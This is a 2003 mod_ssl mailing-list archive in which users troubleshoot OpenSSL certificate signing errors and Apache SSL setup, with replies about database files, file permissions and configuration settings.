	by speedy.ida.ing.tu-bs.de (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with ESMTP id h2DDCN024450
	for ; Thu, 13 Mar 2003 14:12:23 +0100
Date: Thu, 13 Mar 2003 14:12:23 +0100 (CET)
From: Jan Staschulat 
To: modssl-users@modssl.org
Subject: self signed certificate
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan Staschulat 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi, I have problems creating a self signed certificate. 
I'm using OpenSSL 0.9.7a on SunOS 5.7 sparc SUNW,Ultra-2
I went through the description of FAQ-page:
http://www.corserv.com/freebsd/apache-ssl-howto.html

OpenSSL quits with the error when I want to sign the server.csr:

$> openssl ca -config ca.config -out server.crt -infiles server.csr
...
Sign the certificate? [y/n]:y
failed to update database
TXT_DB error number 2

I searched on google and found the same question on the modssl-users
mailing list (Dez 2002) , which is still unanswered:

http://www.mail-archive.com/modssl-users@modssl.org/msg15877.html


Any Ideas?

Jan

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 14:32:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 12CE12AA02A; Thu, 13 Mar 2003 14:32:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns2.bln1.siemens.de (ns2.bln1.siemens.de [194.138.127.35])
	by master.modssl.org (Postfix) with ESMTP id D239A2AA01F
	for ; Thu, 13 Mar 2003 14:32:08 +0100 (CET)
Received: from mail.bln1.siemens.de (stbf6582 [194.138.127.68])
	by ns2.bln1.siemens.de (8.11.6+Sun/8.11.6) with ESMTP id h2DDW0924006
	for ; Thu, 13 Mar 2003 14:32:00 +0100 (MET)
Received: from sietec.de (localhost [127.0.0.1])
	by mail.bln1.siemens.de (8.11.6+Sun/8.11.6) with ESMTP id h2DDW0418648
	for ; Thu, 13 Mar 2003 14:32:01 +0100 (MET)
Message-ID: <3E708850.3040208@sietec.de>
Date: Thu, 13 Mar 2003 14:32:00 +0100
From: Alex Kuehne 
Organization: SAG
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2) Gecko/20021126
X-Accept-Language: en,de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: self signed certificate
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Kuehne 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

 > -----Original Message-----
 > From: Jan Staschulat [mailto:jans@ida.ing.tu-bs.de]
 > Sent: Thursday, March 13, 2003 2:12 PM
 > To: modssl-users@modssl.org
 > Subject: self signed certificate
 >
 >
 > Hi, I have problems creating a self signed certificate.
 > I'm using OpenSSL 0.9.7a on SunOS 5.7 sparc SUNW,Ultra-2
 > I went through the description of FAQ-page:
 > http://www.corserv.com/freebsd/apache-ssl-howto.html
 >
 > OpenSSL quits with the error when I want to sign the server.csr:
 >
 > $> openssl ca -config ca.config -out server.crt -infiles server.csr
 > ...
 > Sign the certificate? [y/n]:y
 > failed to update database
 > TXT_DB error number 2
 >
 > I searched on google and found the same question on the modssl-users
 > mailing list (Dez 2002) , which is still unanswered:
 >
 > http://www.mail-archive.com/modssl-users@modssl.org/msg15877.html

Hello,

don't mess with openssl. Please refer to

http://www.modssl.org/docs/2.8/ssl_faq.html#ToC29.

There is a script sign.sh in the contrib dir of modssl source package.

Best regards
Alex Kuehne


--
Network Manager, SAG, Berlin, Germany

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 14:43:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B73EB2AA02A; Thu, 13 Mar 2003 14:43:55 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gavia.izoard.com (w044.z064003036.was-dc.dsl.cnc.net [64.3.36.44])
	by master.modssl.org (Postfix) with ESMTP id 503AD2AA01F
	for ; Thu, 13 Mar 2003 14:43:54 +0100 (CET)
Received: from mortirolo.izoard.com ([192.168.0.50] helo=izoard.com)
	by gavia.izoard.com with smtp (Exim 3.35 #1 (Debian))
	id 18tSzu-0006Cw-00; Thu, 13 Mar 2003 08:43:51 -0500
Received: from 199.196.144.12
        (SquirrelMail authenticated user ams)
        by www.izoard.com with HTTP;
        Thu, 13 Mar 2003 08:43:51 -0500 (EST)
Message-ID: <42041.199.196.144.12.1047563031.squirrel@www.izoard.com>
Date: Thu, 13 Mar 2003 08:43:51 -0500 (EST)
Subject: Re: self signed certificate
From: "Aaron Stromas" 
To: 
In-Reply-To: 
References: 
Cc: 
X-Mailer: SquirrelMail (version 1.2.0 [rc2])
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Stromas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Jan Staschulat said:
> Hi, I have problems creating a self signed certificate.
> I'm using OpenSSL 0.9.7a on SunOS 5.7 sparc SUNW,Ultra-2
> I went through the description of FAQ-page:
> http://www.corserv.com/freebsd/apache-ssl-howto.html
>
> OpenSSL quits with the error when I want to sign the server.csr:
>
> $> openssl ca -config ca.config -out server.crt -infiles server.csr ...
> Sign the certificate? [y/n]:y
> failed to update database
> TXT_DB error number 2
>
> I searched on google and found the same question on the modssl-users
> mailing list (Dez 2002) , which is still unanswered:
>
> http://www.mail-archive.com/modssl-users@modssl.org/msg15877.html
>
>
> Any Ideas?

My guess is you don't have the database file. On unix system do "touch ",
where  is the value of the database in ca.config.

I also remember having to initialise the serial file: echo 00 > serial

HTH
>
> Jan
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


-- 
Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
ams@izoard.com        | BRTN commentator
+1 (301) 493 4933     | L'Alpe d'Huez
http://www.izoard.com | 1995 Tour de France



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 18:12:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 20AB02AA02A; Thu, 13 Mar 2003 18:12:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 7574B2AA01F
	for ; Thu, 13 Mar 2003 18:12:02 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 492E7807A6
	for ; Fri, 14 Mar 2003 13:37:01 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Fri, 14 Mar 2003 13:37:00 -0600
User-Agent: KMail/1.4.3
References: <20030313110136.B864C39E1@xmxpita.myway.com>
In-Reply-To: <20030313110136.B864C39E1@xmxpita.myway.com>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303141337.00757.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Okay, I cleaned out all of the older versions of the keys and ran the scr=
ipts=20
again. I ended up with this:

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
CA verifying: www.pelathe.org.crt <-> CA cert
www.pelathe.org.crt: OK

That does mean it worked, right? Everything is good? If so, should I move=
 the=20
new files I have to their respective directories or should I change my=20
httpd.conf file to point to the new directory? I don't know if moving or=20
copying/patsing damages the integrity of the encryptions or not.


On Thursday 13 March 2003 05:01, camun2020 wrote:
>  --- On Thu 03/13, A. Putnam < aputnam@pelathe.org > wrote:
>
> Still no luck. I get the same error with this script too. Thank you for
> pointing out the script though. It was a LOT easier to use than the oth=
er
> one I had been using.
>
> OK, now I'm getting vague but could this be to do with the fact that yo=
u
> have some 'incomplete' keys and data in your ca.db.certs directory from=
 the
> previous failed attempts?
>
> Make sure you start in a whole new clean directory...
>
> Having said that, I haven't actually tried those scripts with the most
> recent openssl so perhaps there are new problems.
>
> cam
>
> _______________________________________________
> No banners. No pop-ups. No kidding.
> Introducing My Way - http://www.myway.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 18:33:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E21842AA02A; Thu, 13 Mar 2003 18:33:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gavia.izoard.com (izoard.com [64.3.36.44])
	by master.modssl.org (Postfix) with ESMTP id 14B0C2AA01F
	for ; Thu, 13 Mar 2003 18:33:23 +0100 (CET)
Received: from mortirolo.izoard.com ([192.168.0.50] helo=izoard.com)
	by gavia.izoard.com with smtp (Exim 3.35 #1 (Debian))
	id 18tWZz-0006SK-00; Thu, 13 Mar 2003 12:33:19 -0500
Received: from 199.196.144.12
        (SquirrelMail authenticated user ams)
        by www.izoard.com with HTTP;
        Thu, 13 Mar 2003 12:33:19 -0500 (EST)
Message-ID: <49637.199.196.144.12.1047576799.squirrel@www.izoard.com>
Date: Thu, 13 Mar 2003 12:33:19 -0500 (EST)
Subject: Re: private key not found
From: "Aaron Stromas" 
To: 
In-Reply-To: <200303141337.00757.aputnam@pelathe.org>
References: <200303141337.00757.aputnam@pelathe.org>
Cc: 
X-Mailer: SquirrelMail (version 1.2.0 [rc2])
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Stromas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You can copy your cert and key files to apache's conf directory.

A. Putnam said:
> Okay, I cleaned out all of the older versions of the keys and ran the
> scripts  again. I ended up with this:
>
> 1 out of 1 certificate requests certified, commit? [y/n]y
> Write out database with 1 new entries
> Data Base Updated
> CA verifying: www.pelathe.org.crt <-> CA cert
> www.pelathe.org.crt: OK
>
> That does mean it worked, right? Everything is good? If so, should I
> move the  new files I have to their respective directories or should I
> change my  httpd.conf file to point to the new directory? I don't know
> if moving or  copying/patsing damages the integrity of the encryptions
> or not.
>
>
> On Thursday 13 March 2003 05:01, camun2020 wrote:
>>  --- On Thu 03/13, A. Putnam < aputnam@pelathe.org > wrote:
>>
>> Still no luck. I get the same error with this script too. Thank you
>> for pointing out the script though. It was a LOT easier to use than
>> the other one I had been using.
>>
>> OK, now I'm getting vague but could this be to do with the fact that
>> you have some 'incomplete' keys and data in your ca.db.certs directory
>> from the previous failed attempts?
>>
>> Make sure you start in a whole new clean directory...
>>
>> Having said that, I haven't actually tried those scripts with the most
>> recent openssl so perhaps there are new problems.
>>
>> cam
>>
>> _______________________________________________
>> No banners. No pop-ups. No kidding.
>> Introducing My Way - http://www.myway.com
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>
> --
> A. Putnam
> Assistant IT Administrator
> Pelathe Community Resource Center
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


-- 
Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
ams@izoard.com        | BRTN commentator
+1 (301) 493 4933     | L'Alpe d'Huez
http://www.izoard.com | 1995 Tour de France



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 18:33:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 46CC72AA02A; Thu, 13 Mar 2003 18:33:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id B6F2F2AA01F
	for ; Thu, 13 Mar 2003 18:33:42 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA07992;
	Thu, 13 Mar 2003 12:32:02 -0500
Date: Thu, 13 Mar 2003 12:32:01 -0500 (EST)
From: "R. DuFresne" 
To: "A. Putnam" 
Cc: modssl-users@modssl.org
Subject: Re: private key not found
In-Reply-To: <200303141337.00757.aputnam@pelathe.org>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


you should beable to safely move then into place.  make sure perms are
restricted as possible to prevent their info from being leaked.

On Fri, 14 Mar 2003, A. Putnam wrote:

> Okay, I cleaned out all of the older versions of the keys and ran the scripts 
> again. I ended up with this:
> 
> 1 out of 1 certificate requests certified, commit? [y/n]y
> Write out database with 1 new entries
> Data Base Updated
> CA verifying: www.pelathe.org.crt <-> CA cert
> www.pelathe.org.crt: OK
> 
> That does mean it worked, right? Everything is good? If so, should I move the 
> new files I have to their respective directories or should I change my 
> httpd.conf file to point to the new directory? I don't know if moving or 
> copying/patsing damages the integrity of the encryptions or not.
> 
> 
> On Thursday 13 March 2003 05:01, camun2020 wrote:
> >  --- On Thu 03/13, A. Putnam < aputnam@pelathe.org > wrote:
> >
> > Still no luck. I get the same error with this script too. Thank you for
> > pointing out the script though. It was a LOT easier to use than the other
> > one I had been using.
> >
> > OK, now I'm getting vague but could this be to do with the fact that you
> > have some 'incomplete' keys and data in your ca.db.certs directory from the
> > previous failed attempts?
> >
> > Make sure you start in a whole new clean directory...
> >
> > Having said that, I haven't actually tried those scripts with the most
> > recent openssl so perhaps there are new problems.
> >
> > cam
> >
> > _______________________________________________
> > No banners. No pop-ups. No kidding.
> > Introducing My Way - http://www.myway.com
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 18:35:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0644C2AA02A; Thu, 13 Mar 2003 18:35:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id B065D2AA023
	for ; Thu, 13 Mar 2003 18:35:49 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id C97D080E5E
	for ; Fri, 14 Mar 2003 14:00:48 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Fri, 14 Mar 2003 14:00:48 -0600
User-Agent: KMail/1.4.3
References: <20030313110136.B864C39E1@xmxpita.myway.com> <200303141337.00757.aputnam@pelathe.org>
In-Reply-To: <200303141337.00757.aputnam@pelathe.org>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303141400.48531.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I went ahead and changed my httpd.conf file to reflect the new directory.=
 And=20
when I went to restart Apache, it worked! (THANK YOU!!) However, when I g=
o to=20
my shopping cart and click 'checkout' (thus sending me to the secure serv=
er)=20
I get this error moeesage:

"www.pelathe.org has received an incorrect or unexpected message. Error C=
ode:=20
-12227"

I've never seen an error code like that before. Does anyone know what it=20
means?

On Friday 14 March 2003 13:37, A. Putnam wrote:
> Okay, I cleaned out all of the older versions of the keys and ran the
> scripts again. I ended up with this:
>
> 1 out of 1 certificate requests certified, commit? [y/n]y
> Write out database with 1 new entries
> Data Base Updated
> CA verifying: www.pelathe.org.crt <-> CA cert
> www.pelathe.org.crt: OK
>
> That does mean it worked, right? Everything is good? If so, should I mo=
ve
> the new files I have to their respective directories or should I change=
 my
> httpd.conf file to point to the new directory? I don't know if moving o=
r
> copying/patsing damages the integrity of the encryptions or not.
>
> On Thursday 13 March 2003 05:01, camun2020 wrote:
> >  --- On Thu 03/13, A. Putnam < aputnam@pelathe.org > wrote:
> >
> > Still no luck. I get the same error with this script too. Thank you f=
or
> > pointing out the script though. It was a LOT easier to use than the o=
ther
> > one I had been using.
> >
> > OK, now I'm getting vague but could this be to do with the fact that =
you
> > have some 'incomplete' keys and data in your ca.db.certs directory fr=
om
> > the previous failed attempts?
> >
> > Make sure you start in a whole new clean directory...
> >
> > Having said that, I haven't actually tried those scripts with the mos=
t
> > recent openssl so perhaps there are new problems.
> >
> > cam
> >
> > _______________________________________________
> > No banners. No pop-ups. No kidding.
> > Introducing My Way - http://www.myway.com
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 18:50:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 89EB12AA02A; Thu, 13 Mar 2003 18:50:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xmxpita.myway.com (nn1.excitenetwork.com [207.159.120.55])
	by master.modssl.org (Postfix) with ESMTP id 43AF02AA01F
	for ; Thu, 13 Mar 2003 18:50:00 +0100 (CET)
Received: by xmxpita.myway.com (Postfix, from userid 110)
	id 0166D3A09; Thu, 13 Mar 2003 12:49:53 -0500 (EST)
To: modssl-users@modssl.org
Subject: Re: private key not found
Received: from [194.201.150.100] by mprdmailfe3.nwk.myway.com via HTTP; Thu, 13 Mar 2003 12:49:53 EST
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: ID = 427ca1860f709c6c72e7c11ebe29e70d
From: "cam" 
MIME-Version: 1.0
X-Sender: camun2020@myway.com
X-Mailer: PHP
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Cc: 
Message-Id: <20030313174953.0166D3A09@xmxpita.myway.com>
Date: Thu, 13 Mar 2003 12:49:53 -0500 (EST)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "cam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


 --- On Fri 03/14, A. Putnam < aputnam@pelathe.org > wrote:
>That does mean it worked, right? Everything is good? 

Everything is rosy...

>If so, should I move the 
>new files I have to their respective directories or should I change >my httpd.conf file to point to the new directory? 

I would personally suggest that you protect (chmod 700;chown root.root) the area where the files are currently stored and copy the key and the crt to the httpd.conf area where you should set appropriate perms on them too. See e.g. here for some guidance:

http://en.tldp.org/HOWTO/SSL-RedHat-HOWTO-4.html

>I don't know if >moving or copying/patsing damages the integrity of the encryptions or >not.

No, not in any way that I know of...

_______________________________________________
No banners. No pop-ups. No kidding.
Introducing My Way - http://www.myway.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 18:50:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1776F2AA02A; Thu, 13 Mar 2003 18:50:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gavia.izoard.com (w044.z064003036.was-dc.dsl.cnc.net [64.3.36.44])
	by master.modssl.org (Postfix) with ESMTP id CE53E2AA01F
	for ; Thu, 13 Mar 2003 18:50:23 +0100 (CET)
Received: from mortirolo.izoard.com ([192.168.0.50] helo=izoard.com)
	by gavia.izoard.com with smtp (Exim 3.35 #1 (Debian))
	id 18tWqQ-0006U1-00; Thu, 13 Mar 2003 12:50:18 -0500
Received: from 199.196.144.12
        (SquirrelMail authenticated user ams)
        by www.izoard.com with HTTP;
        Thu, 13 Mar 2003 12:50:18 -0500 (EST)
Message-ID: <50795.199.196.144.12.1047577818.squirrel@www.izoard.com>
Date: Thu, 13 Mar 2003 12:50:18 -0500 (EST)
Subject: Re: private key not found
From: "Aaron Stromas" 
To: 
In-Reply-To: <200303141400.48531.aputnam@pelathe.org>
References: <200303141400.48531.aputnam@pelathe.org>
Cc: 
X-Mailer: SquirrelMail (version 1.2.0 [rc2])
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Stromas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just a guess: have you also added the CA certificate to the CA certificate
bundle? Also, set your logging to "trace", it should give you a clue.

-a

A. Putnam said:
> I went ahead and changed my httpd.conf file to reflect the new
> directory. And  when I went to restart Apache, it worked! (THANK YOU!!)
> However, when I go to  my shopping cart and click 'checkout' (thus
> sending me to the secure server)  I get this error moeesage:
>
> "www.pelathe.org has received an incorrect or unexpected message. Error
> Code:  -12227"
>
> I've never seen an error code like that before. Does anyone know what
> it  means?
>
> On Friday 14 March 2003 13:37, A. Putnam wrote:
>> Okay, I cleaned out all of the older versions of the keys and ran the
>> scripts again. I ended up with this:
>>
>> 1 out of 1 certificate requests certified, commit? [y/n]y
>> Write out database with 1 new entries
>> Data Base Updated
>> CA verifying: www.pelathe.org.crt <-> CA cert
>> www.pelathe.org.crt: OK
>>
>> That does mean it worked, right? Everything is good? If so, should I
>> move the new files I have to their respective directories or should I
>> change my httpd.conf file to point to the new directory? I don't know
>> if moving or copying/patsing damages the integrity of the encryptions
>> or not.
>>
>> On Thursday 13 March 2003 05:01, camun2020 wrote:
>> >  --- On Thu 03/13, A. Putnam < aputnam@pelathe.org > wrote:
>> >
>> > Still no luck. I get the same error with this script too. Thank you
>> > for pointing out the script though. It was a LOT easier to use than
>> > the other one I had been using.
>> >
>> > OK, now I'm getting vague but could this be to do with the fact that
>> > you have some 'incomplete' keys and data in your ca.db.certs
>> > directory from the previous failed attempts?
>> >
>> > Make sure you start in a whole new clean directory...
>> >
>> > Having said that, I haven't actually tried those scripts with the
>> > most recent openssl so perhaps there are new problems.
>> >
>> > cam
>> >
>> > _______________________________________________
>> > No banners. No pop-ups. No kidding.
>> > Introducing My Way - http://www.myway.com
>> > ______________________________________________________________________
>> > Apache Interface to OpenSSL (mod_ssl)
>> > www.modssl.org User Support Mailing List
>> > modssl-users@modssl.org Automated List Manager
>> >      majordomo@modssl.org
>
> --
> A. Putnam
> Assistant IT Administrator
> Pelathe Community Resource Center
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


-- 
Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
ams@izoard.com        | BRTN commentator
+1 (301) 493 4933     | L'Alpe d'Huez
http://www.izoard.com | 1995 Tour de France



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 18:56:06 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BB45B2AA02C; Thu, 13 Mar 2003 18:56:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xmxpita.myway.com (nn1.excitenetwork.com [207.159.120.55])
	by master.modssl.org (Postfix) with ESMTP id 980D32AA023
	for ; Thu, 13 Mar 2003 18:56:04 +0100 (CET)
Received: by xmxpita.myway.com (Postfix, from userid 110)
	id E871039F9; Thu, 13 Mar 2003 12:55:58 -0500 (EST)
To: modssl-users@modssl.org
Subject: Re: private key not found
Received: from [194.201.150.100] by mprdmailfe3.nwk.myway.com via HTTP; Thu, 13 Mar 2003 12:55:58 EST
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: ID = 427ca1860f709c6c72e7c11ebe29e70d
From: "cam" 
MIME-Version: 1.0
X-Sender: camun2020@myway.com
X-Mailer: PHP
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Cc: 
Message-Id: <20030313175558.E871039F9@xmxpita.myway.com>
Date: Thu, 13 Mar 2003 12:55:58 -0500 (EST)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "cam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


 --- On Fri 03/14, A. Putnam < aputnam@pelathe.org > wrote:
>I get this error moeesage:

>"www.pelathe.org has received an incorrect or unexpected message. Error Code: -12227"
>I've never seen an error code like that before. Does anyone know what it means?

Again, a guess, but you haven't set SSLVerifyClient Require have you? You (presumably, otherwise, get reading on client certificates) want 'none' here. If not, in fact, in any case, have a look in your SSL log files (not the 'normal' log files) which will have been specified in httpd.conf... The logs are your friend.

cam

_______________________________________________
No banners. No pop-ups. No kidding.
Introducing My Way - http://www.myway.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 20:00:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 68D722AA02A; Thu, 13 Mar 2003 20:00:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 91C9C2AA01F
	for ; Thu, 13 Mar 2003 20:00:16 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id F3E1A80E5E
	for ; Fri, 14 Mar 2003 15:25:14 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
